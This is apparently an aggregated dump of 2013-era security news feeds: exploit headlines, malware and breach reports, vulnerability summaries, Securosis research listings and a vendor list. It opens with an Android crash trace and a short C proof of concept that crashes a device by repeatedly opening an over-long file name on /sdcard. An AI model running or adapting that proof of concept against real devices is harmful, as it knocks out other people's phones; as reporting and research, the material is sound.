    #01  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #02  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #03  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #04  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #05  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #06  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #07  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #08  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #09  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #10  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #11  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #12  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #13  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #14  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #15  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #16  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)

##### PoC #####

#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buf[5000];
    int j, k;
    FILE *fp;

    /* Path to sdcard, typically /sdcard/ */
    strcpy(buf, "/sdcard/");

    /* Append 2049 'A's so the name is longer than 2048 bytes */
    for (k = 0; k <= 2048; k++) {
        strcat(buf, "A");
    }

    /* Try to create the over-long file repeatedly; the handles are never closed */
    for (j = 0; j <= 50; j++) {
        fp = fopen(buf, "w");
    }

    return 0;
}

==> MySQL 5.1.53 Privilege Escalation Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MySQL 5.1.53

==> MySQL 5.5.19 Heap-based BoF Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MySQL 5.5.19

==> MySQL 5.5.19 Stack-based BoF Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MySQL 5.5.19

==> FreeFTPD Remote Authentication Bypass Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : FreeFTPD

==> IBM System Director RCE Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : IBM System Director 5.20.3 Service Update 2

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA.

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said.

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials.

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity.

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group.

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victim's bank account.

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions.

==> PHEARCON Call For Papers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 Forwarded from: AA <anarchy.ang31 (at) gmail.com> ::[ About ]:: http://www.phearcon.org PHEARCON is a hacking conference based in Milwaukee, Wisconsin with the goal of bringing hackers together under one roof to learn, hack, and party! ::[ When / Where ]:: October 12th @ 10am [-]location[-] Bucketworks 706 S 5th St. Milwaukee, WI. 53204 ::[ Format ]:: One main track that will host 8 50-60 minute talks. One turbo track that will host 8...

==> Surprise Visitors Are Unwelcome At The NSA's Unfinished Utah Spy Center (Especially When They Take Photos)

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://www.forbes.com/sites/kashmirhill/2013/03/04/nsa-utah-data-center-visit/ By Kashmir Hill Forbes Staff Forbes.com 03/04/2013 Most people who visit Salt Lake City in the winter months are excited about taking advantage of the area's storied slopes. While skiing was on my itinerary last week, I was more excited about an offbeat tourism opportunity in the area: I wanted to check out the construction site for the country's biggest...

==> Gang arrested for hacking Dubai exchange companies' accounts

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://gulfnews.com/news/gulf/uae/crime/gang-arrested-for-hacking-dubai-exchange-companies-accounts-1.1153543 By Bassma Al Jandaly Senior Reporter GulfNews.com March 3, 2013 Dubai: The Dubai Police have arrested a cyber crime gang who were able to transfer more than Dh7 million from exchange companies in Dubai, a senior official from Dubai Police said. Major General Khamis Matter Al Mazeina, acting chief of Dubai Police, said on Sunday that...

==> Ex-Exel president found guilty of hacking former employers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://www.theregister.co.uk/2013/03/05/exel_president_guilty_hacking/ By Iain Thomson in San Francisco The Register 5th March 2013 The former president of transportation logistics firm Exel has been found guilty of hacking into the servers of his former employer to glean secrets for his new business. A federal jury found Michael Musacchio, 61, guilty of one felony count of conspiracy to make unauthorized access to a protected computer...

==> BofA Confirms Third-Party Breach

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 05 http://www.bankinfosecurity.com/bofa-confirms-third-party-breach-a-5582 By Tracy Kitten Bank Info Security March 5, 2013 Hacktivists are taking credit for a data breach impacting Bank of America - an incident the hackers claim allowed them to access employee and executive data stored through a third party. "The data was retrieved from an Israeli server in Tel Aviv," says the hacktivist group Par:AnoIA, part of the Anonymous...

==> MND website and China Military Online attacked by overseas hackers 144,000-odd times per month

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://english.peopledaily.com.cn/90786/8151567.html By Pang Qingjie and Lv Desheng China Military Online March 04, 2013 Geng Yansheng, director of the Information Affairs Bureau of the Ministry of National Defense (MND) of the People's Republic of China (PRC) and spokesman of the MND, said at the regular press conference of the MND held on February 28, 2013 in Beijing that the Chinese People's Liberation Army (PLA) has never...

==> Prepare for 'post-crypto world', warns godfather of encryption

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://www.theregister.co.uk/2013/03/01/post_cryptography_security_shamir/ By John Leyden The Register 1st March 2013 Cryptography is 'becoming less important' because of state-sponsored malware, according to one of the founding fathers of public-key encryption. Turing award-winning cryptographer Adi Shamir (the S in RSA) said the whole basis of modern cryptography is under severe strain from attacks on security infrastructure...

==> CIO weighs the dilemma of medical device FDA security updates

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://healthitsecurity.com/2013/02/27/cio-weighs-the-dilemma-of-medical-device-security-updates/ By Patrick Ouellette Health IT Security February 27, 2013 As John D. Halamka, MD, CIO of Beth Israel Deaconess Medical Center (BIDMC), notes in a recent blog post, dealing with medical device security can certainly be a hassle for CIOs on a number of levels. One of the major barriers in securing these devices is the fact that many healthcare...

==> Evernote resets user passwords after being hit by "coordinated" hack

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://arstechnica.com/security/2013/03/evernote-resets-all-user-passwords-after-coordinated-breach-attempt/ By Nathan Mattise Ars Technica Mar 2 2013 Evernote is requiring each of its 50 million users to reset their login credentials after the site's security team detected a security breach that exposed password data and other personal information. In a security notice published Saturday, Evernote said the precautionary password reset...

==> Ankit Fadia Revealed

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://forbesindia.com/article/beyond-business/ankit-fadia-revealed/34793/0 By Charles Assisi Forbes India FEATURES/BEYOND BUSINESS Feb 26, 2013 Dear Ankit Fadia, First of all, I'd like to place my unconditional apologies on the record. In fact, before I started to write you this letter, I promised my colleagues these pages will be used to crucify and call your bluff before your 16th book on computer security hits the shelves a few months...

==> DHS bigwig 'adamantly opposed' to degree fetishism

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://www.theregister.co.uk/2013/02/26/no_degree_needed_for_infosec_pros/ By Jack Clark in San Francisco The Register 26th February 2013 RSA 2013 HR and in-house recruitment types should get rid of the myopic idea that to work in IT you must have been to university, says a Department of Homeland Security honcho. Many "corporate and government jobs actually require a college degree or equivalent work experience," DHS deputy...

==> Hacking Victim Bit9 Blames SQL Injection Flaw

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://www.cio.com/article/729401/Hacking_Victim_Bit9_Blames_SQL_Injection_Flaw By Jeremy Kirk IDG News Service February 25, 2013 Bit9 said a common Web application vulnerability was responsible for allowing hackers to ironically use the security vendor's systems as a launch pad for attacks on other organizations. Based in Waltham, Massachusetts, the company sells a security platform that is designed in part to stop hackers from...

==> A New Cold War, in Cyberspace, Tests U.S. Ties to China

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://www.nytimes.com/2013/02/25/world/asia/us-confronts-cyber-cold-war-with-china.html By DAVID E. SANGER The New York Times February 24, 2013 WASHINGTON -- When the Obama administration circulated to the nation's Internet providers last week a lengthy confidential list of computer addresses linked to a hacking group that has stolen terabytes of data from American corporations, it left out one crucial fact: that nearly every one of the...

==> Server hack prompts call for cPanel customers to take "immediate action"

http://seclists.org/rss/isn.rss Posted by InfoSec News on Feb 25 http://arstechnica.com/security/2013/02/server-hack-prompts-call-for-cpanel-customers-to-take-immediate-action/ By Dan Goodin Ars Technica Feb 22 2013 The providers of the cPanel website management application are warning some users to immediately change their systems' root or administrative passwords after discovering one of its servers has been hacked. In an e-mail sent to customers who have filed a cPanel support request in the past...

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own.

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technologically intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 MB. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> Oracle Java multiple security vulnerabilities, updated since 11.02.2013

http://securityvulns.com/informer/rss.asp?l=EN ~50 different vulnerabilities are fixed in the Critical Patch Update (CPU). Applications: JRE 6, JDK 6, JDK 7, JRE 7 (05.03.2013)

==> Adobe Reader / Acrobat security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflows are exploited in-the-wild. Applications: Reader 10.1, Acrobat 10.1, Reader 9.5, Reader 11.0, Acrobat 9.5, Acrobat 11.0 (03.03.2013)

==> Adobe Flash Player multiple security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Multiple code execution vulnerabilities are exploited in-the-wild. Applications: Flash Player 11.5 (03.03.2013)

==> Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

http://securityvulns.com/informer/rss.asp?l=EN PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc. Applications: django 1.4, PHP-Fusion 7.02, Piwigo 2.4, Geeklog 1.8, Question2Answer 1.5, rubygems fileutils 0.7, Joomla! 3.0, Joomla! 2.5, Maven 3.0, fusionforge 5.0, Fusion 4.51 (03.03.2013)

==> Cisco Prime Central / Cisco Unified Communications Manager / Cisco Unified Presence Server DoS

http://securityvulns.com/informer/rss.asp?l=EN Different DoS conditions on traffic processing. Applications: Unified Presence Server 8.6, Unified Presence Server 9.0, Unified Presence Server 9.1, Prime Central for Hosted Collaboration Solution 8.6, Prime Central for Hosted Collaboration Solution 9.0, Unified Communications Manager 9.1 (03.03.2013)

==> Airvana HubBub routers cross-site scripting

http://securityvulns.com/informer/rss.asp?l=EN Web interface cross-site scripting. Applications: HubBub C1-600-RT (03.03.2013)

==> SAP applications multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Code executions, filesystem access, information leakage, DoS. (03.03.2013)

==> War FTP Daemon memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on logging. Applications: War FTP Daemon 1.82 (02.03.2013)

==> Photodex ProShow Producer buffer overflow, updated since 18.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow on .pxs / .pxt files parsing. Applications: ProShow Producer 5.0 (02.03.2013)

==> openjpeg library security vulnerabilities, updated since 16.07.2012

http://securityvulns.com/informer/rss.asp?l=EN Vulnerabilities on JPEG encoding and decoding. Applications: openjpeg 1.3 (02.03.2013)

==> Transmission memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on micro transport packet parsing. Applications: Transmission 2.61 (02.03.2013)

==> Apache security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Cross-site scripting in mod_info, mod_status, mod_imagemap, mod_ldap, mod_proxy_ftp and mod_proxy_balancer. Applications: Apache 2.2, Apache 2.4 (02.03.2013)

==> Linux kernel security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Privilege escalation, information leak. Applications: kernel 2.6, kernel 3.4 (02.03.2013)

==> D-Link DIR-645 unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN It's possible to obtain administration password without authentication. Applications: D-Link DIR-645 (02.03.2013)

==> OpenSSL / PolarSSL / GnuTLS security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Timing attacks, DoS. Applications: OpenSSL 1.0, PolarSSL 1.2, GnuTLS 2.12 (02.03.2013)

==> dbus-glib privilege escalation

http://securityvulns.com/informer/rss.asp?l=EN Privilege escalation in NameOwnerChanged signal processing. Applications: dbus-glib 0.100 (02.03.2013)

==> PHP security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN safe_dir protection bypass and code execution on SOAP handling. Applications: PHP 5.3 (02.03.2013)

==> sudo protection bypass

http://securityvulns.com/informer/rss.asp?l=EN It's possible to bypass password request by manipulating timestamps. Applications: sudo 1.8 (02.03.2013)

==> RSA Authentication Agent protection bypass

http://securityvulns.com/informer/rss.asp?l=EN In some cases only the PIN is requested instead of the full authentication sequence. Applications: RSA Authentication Agent 7.1 (02.03.2013)

==> cfingerd buffer overflow

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow on request parsing. Applications: cfingerd 1.4 (02.03.2013)

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes, we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas.

We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09).
2. Tokenization vs. Encryption: Options for compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption.
3. Next, you should read our series of posts on the Data Security Lifecycle which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3.
4. The general principles of Information-centric/Data Security.
5. Data Verification Issues.
6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years.
7. Defensive Security Stack; showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - it’s More than A + B + C.
8. We believe that two existing technologies are evolving into the “core” of data security: Data Loss Prevention and Database Activity Monitoring. They are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection.
9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect.
10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic, and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet.)
11. Related to data classification, here is a post on Information Governance.
12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure.
13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how our files are used, but who the heck is accessing them, should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor.

General Coverage
------------

1. Sorry, Data Labeling is Not the Same as DRM/ERM
2. Data Labels Suck.
3. Security Requirements for Electronic Medical Records.
4. The Data Breach Triangle.
5. Data Harvesting and Privacy.

Presentations
---------

These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section).

* This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009.
* This presentation is on Mobile Data Security for the Enterprise.
* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.
* Here’s the current version of Pragmatic Data Security which provides a good, practical process overview with specific implementation details.
* Presentation on Data Protection in the Enterprise. Kind of a corporate overview.
* Presentation on XML Security.

Podcasts, Webcasts and Multimedia
---------

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools.

If much of this material seems somewhat generic, that’s because data/information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu.

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper:

* Understanding and Selecting a Web Application Firewall
* SIEM 2.0: Replacing Your SIEM Solution
* Securing Applications at Scale
* Masking for Compliance
* Code Security: Security for Developers
* Pragmatic Data Security
* Network Security Fundamentals
* Endpoint Security Fundamentals
* Database Security 2.0: Database Security for Relational and Non-relational Systems
* Understanding and Implementing Network Segregation
* Data Security for the Cloud

Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library.

==> All Research Papers

http://securosis.com/feeds/research

Application Security
* Securing Big Data: Recommendations for Securing Hadoop and NoSQL
* Pragmatic WAF Management: Giving Web Apps a Fighting Chance
* Building a Web Application Security Program

Cloud and Virtualization

Compliance
* Tokenization Guidance
* Tokenization vs. Encryption: Options for Compliance
* Data Encryption 101: A Pragmatic Approach to PCI

Data Security
* Understanding and Selecting a Key Management Solution
* Pragmatic Key Management for Data Encryption
* Understanding and Selecting Data Masking Solutions
* Implementing and Managing a Data Loss Prevention Solution
* Defending Data on iOS
* Understanding and Selecting a Database Security Platform
* Understanding and Selecting a File Activity Monitoring Solution
* Database Activity Monitoring: Software vs. Appliance
* The Securosis 2010 Data Security Survey
* Understanding and Selecting a Tokenization Solution
* Understanding and Selecting a DLP Solution
* Understanding and Selecting a Database Encryption or Tokenization Solution
* Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0)
* Database Assessment
* Content Discovery Whitepaper
* Selecting a Database Activity Monitoring Solution

Endpoint Security
* The Endpoint Security Management Buyer’s Guide
* Endpoint Security Fundamentals
* Best Practices for Endpoint DLP
* Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks

Network Security
* Network-based Threat Intelligence: Searching for the Smoking Gun
* Defending Against Denial of Service (DoS) Attacks
* Network-based Malware Detection: Filling the Gaps of AV
* Applied Network Security Analysis: Moving from Data to Information
* Fact-Based Network Security: Metrics and the Pursuit of Prioritization
* Network Security in the Age of Any Computing
* Understanding and Selecting an Enterprise Firewall

Project Quant
* Malware Analysis Quant
* Measuring and Optimizing Database Security Operations (DBQuant)
* Network Security Ops Quant Metrics Model
* Network Security Operations Quant Report
* Project Quant Survey Results and Analysis
* Project Quant Metrics Model Report

Security Management
* Building an Early Warning System
* Implementing and Managing Patch and Configuration Management
* Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform
* Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management)
* Security Management 2.0: Time to Replace Your SIEM?
* Security Benchmarking: Going Beyond Metrics
* React Faster and Better: New Approaches for Advanced Incident Response
* Monitoring up the Stack: Adding Value to SIEM
* Understanding and Selecting SIEM/Log Management
* The Business Justification for Data Security

==> Vendor List

http://securosis.com/feeds/research

Company Name / Exhibitor Type / Booth Number / Sub-category / Category / Website

3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/
ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/
Advanced Product Design Exhibitor 340
Advantech Exhibitor 217
AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/
Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/
Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com
Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/
Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/
AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php
AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/
Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/
AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/
American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/
Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/
Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/
Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/
Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/
Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/
APCON Exhibitor 832 http://www.apcon.com/
Application Security, Inc. Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/
AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/
Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/
Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html
ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/
Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/
Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/
Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/
Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/
Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/
AT&T Exhibitor 831 http://www.att.com/
atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/
Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/
Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/
Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/
Axway Silver Sponsor 2225 http://www.axway.com/
BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/
Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/
Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541
Beijing Venustech Inc. Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/
Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/
BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/
Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/
Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/
Black Box Network Services Exhibitor 2550 http://www.blackbox.com/
BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/
Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/
BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/
Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/
BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/
BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/
Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/
BSI Partner Pavilion 1344 http://www.bsigroup.com/
C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com
CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/
Capella University Exhibitor 251 Education Other http://www.capella.edu/
Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware
CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler
Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/
Cenzic, Inc. Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/
Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/
Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware
China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/
CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/
Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/
Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/
Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/
CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/
CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/
Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/
Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/
Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware
cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/
Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/
Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/
Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/
Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/
Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/
